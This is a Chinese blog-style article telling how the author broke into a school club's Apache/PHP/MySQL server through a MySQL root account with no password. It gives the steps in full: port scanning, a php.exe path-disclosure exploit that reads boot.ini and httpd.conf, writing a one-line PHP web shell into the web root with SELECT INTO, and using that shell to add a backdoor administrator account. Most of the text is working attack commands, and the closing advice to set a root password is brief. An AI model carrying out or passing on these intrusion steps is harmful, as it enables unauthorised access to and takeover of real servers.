您的位置:首页技术文章

看紧你的3306端口,一次通过mysql的入侵

【字号: 日期:2023-10-01 13:40:00浏览:109作者:馨心

用superscan扫了一下某个c类的网段,寻找开放80端口的机器,结果就只有一台机器开放了80端口,试着连了一下,是我们学校某个社团的的主页。从端口的banner来看应该是apache(win32),证实一下telnet 211.87.xxx.xxxget(回车)<!DOCTYPE HTML PUBLIC '//IETF//DTD HTML 2.0//EN'><HTML><HEAD><TITLE>501 MethodNot Implemented</TITLE></HEAD><BODY><H1>Method Not Implemented</H1>get to /index.html not supported.<P>Invalid method in request get<P><HR><ADDRESS>Apache/1.3.22 Server at www.xxxxxx.com Port 80</ADDRESS></BODY></HTML>

遗失对主机的连接。C:>呵呵,这下看得更清楚了

据我猜测,应该是'apache+mysql+php'的黄金组合吧习惯性的mysql -h 211.87.xxx.xxx果然连上了Welcome to the MySQL monitor. Commands end with or g.Your MySQL connection id is 17 to server version: 3.23.53-max-nt

Type help; or h for help. Type c to clear the buffer.

mysql>

断开试着mysql -h 211.87.xxx.xxx -u root -ppassword:Welcome to the MySQL monitor. Commands end with or g.Your MySQL connection id is 18 to server version: 3.23.53-max-nt

Type help; or h for help. Type c to clear the buffer.

mysql>呵呵,大家看到了他的root用户没有密码,这是我今天要说的第一个主题。这是相当的危险的,碰见这种情况,有99.999%的可能可以进入既然使用的apache+php,只要找到他在本地存放的web的物理路径就为所欲为了呵呵下一个问题是我今天要说的重点怎么样才能知道那台主机的存放的web的物理路径?方法有很多种,在这里我介绍2种方法供初学者参考首先要告诉大家的是低版本的apache+php有一个漏洞提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名就可以把那个物理文件下载下来。

于是提http://211.87.xxx.xxx/php/php.exe?c:a.txt返回No input file specified. (没有这个漏洞的话提示找不到网页)好的,这说明他有这个漏洞。在提http://211.87.xxx.xxx/php/php.exe?c:boot.ini返回[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating

systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS='Microsoft Windows XP Professional'

/fastdetect 呵呵,装的还是xp。好了,我们可以猜测对方apache的conf文件的物理位置了http://211.87.xxx.xxx/php/php.exe?c:apacheconfhttpd.confNo input file specified.http://211.87.xxx.xxx/php/php.exe?d:apacheconfhttpd.confNo input file specified.http://211.87.xxx.xxx/php/php.exe?e:apacheconfhttpd.confNo input file specified.http://211.87.xxx.xxx/php/php.exe?c:Program Filesapacheconfhttpd.confNo input file specified.http://211.87.xxx.xxx/php/php.exe?f:apacheconfhttpd.conf猜到了,返回了好多东西找到我们想要的# DocumentRoot: The directory out of which you will serve your# documents. By default, all requests are taken from this directory, but# symbolic links and aliases may be used to point to other locations.#DocumentRoot 'D:homepage'看得出来对方的主目录是D:homepage下面的事就好办了,现在就想得到shell?先别急,我们先来看看另一种方法那就是利用mysql的错误随便的浏览一下他的网页找到一处利用mysql的地方http://211.87.xxx.xxx/skonline/study/list.php?id=14

长得太帅了,哈哈哈哈提交http://211.87.xxx.xxx/skonline/study/list.php?id=14返回Warning: Supplied argument is not a valid MySQL result resource in

d:homepageskonlinestudylist.php on line 231呵呵,一览无余。然后,然后就是制造我们的shellmysql -h 211.87.xxx.xxx -u root -ppassword:Welcome to the MySQL monitor. Commands end with or g.Your MySQL connection id is 18 to server version: 3.23.53-max-nt

Type help; or h for help. Type c to clear the buffer.

mysql> use test;Database changedmysql> create table t(cmd text);Query OK, 0 rows affected (0.08 sec)

mysql> insert into t values(<?system($c);?>);Query OK, 1 row affected (12.52 sec)

mysql> select * from t into d:homepagetest.php;

我的shell很简单<?system($c);?>,不到20个字符,但他已经足够了可以让我执行任意命令,由此足以看出php的强大。

怎么用?提交http://211.87.xxx.xxx/test.php?c=net ;user kid /add命令成功完成http://211.87.xxx.xxx/test.php?c=net ;localgroup administrators kid /add命令成功完成

呵呵,测试成功,通过!剩下的就是你自由发挥了。

由此我们不难总结出这一类的入侵步骤:1,找到没有密码的3306端口2,找到对方的web物理路径3,制造shell4,后续工作

呵呵,在这里提醒大家,如果你想要或正在用mysql的时候千万要给自己的root设上一个强有力的密码。看紧你的3306,呵呵。

标签: MySQL 数据库